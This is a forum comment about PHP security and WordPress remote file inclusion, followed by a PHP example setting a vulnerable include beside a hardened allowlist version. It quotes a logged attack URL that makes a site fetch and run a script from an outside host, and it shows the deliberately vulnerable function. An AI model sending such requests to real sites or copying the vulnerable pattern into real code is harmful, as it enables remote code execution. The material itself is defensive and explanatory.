by nadams 4102 days ago
> DO NOT USE PHP FOR ANYTHING THAT REQUIRES SECURITY!

Using [your favorite scripting language] doesn't magically make things like SQL injection and other bad practices go away. There are ways to mitigate those issues by using frameworks in those languages - but really the issue here isn't "OMG PHP SUCKS" but rather Wordpress sucks for allowing something like this to work:

> wpadmin.php?include=http://someothersite.com/some-bad-script.php

I have seen that numerous times in my logs. There are settings in PHP configuration where you can actually prevent external downloading of scripts.

However, ignoring the scripting language itself - the server itself could have been placed behind a firewall that does not allow any outbound web browsing (obviously inbound 80 needs to be open - but there is no reason why it should be allowed to "browse" the web), or an even more limited outbound connection.

Go browse some github projects (obviously those not using a framework) by random people in different languages - you will see that given the opportunity people will still do stupid things - even if the language makes it really hard to do it - as the saying goes "life finds a way".
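The remote-include pattern the comment quotes, beside a hardened version, as an added example (not code from the commenter, from WordPress or from PHP itself). The two php.ini directives in the header comment are the real PHP settings that stop PHP fetching code over a URL; the `pages/` directory, the `PAGE_ALLOWLIST` names and the helper function names are assumptions made for the example.

```php
<?php
// Added example: a vulnerable include beside a hardened one.
//
// First line of defence is configuration, in php.ini (these are real directives):
//   allow_url_include = Off   ; refuse include/require of http:// and ftp:// URLs
//   allow_url_fopen   = Off   ; refuse fopen()/file_get_contents() on remote URLs
// The second line is an outbound firewall on the host, so the web server cannot
// reach arbitrary external sites even if a setting is later switched back on.

// VULNERABLE: the request parameter is used directly as the include path.
// With allow_url_include=On, ?include=http://someothersite.com/some-bad-script.php
// is fetched and executed; with it off, local path traversal is still possible.
function vulnerable_include(string $name): void
{
    include $name;
}

// HARDENED: the parameter is treated as a key into a fixed allowlist, and the
// resolved file must sit inside one directory. It is never used as a raw path.
const PAGE_DIR = __DIR__ . '/pages';                            // assumption: includable pages live here
const PAGE_ALLOWLIST = ['dashboard', 'settings', 'profile'];    // assumption: the known page names

function resolve_page(string $name): ?string
{
    // Unknown key: reject before touching the filesystem.
    if (!in_array($name, PAGE_ALLOWLIST, true)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $name . '.php');
    // realpath() collapses ../ and symlinks; the result must stay under PAGE_DIR.
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function safe_include(string $name): void
{
    $path = resolve_page($name);
    if ($path === null) {
        http_response_code(400);
        exit('invalid page');
    }
    include $path;
}

// Usage: safe_include($_GET['include'] ?? '');
```

The allowlist check is what removes the class of bug: once the request value is a key rather than a path, neither a URL nor a `../` sequence can reach `include`, regardless of how `allow_url_include` is set. The `realpath()` prefix check is belt-and-braces for the case where the allowlist is later loosened to accept arbitrary names.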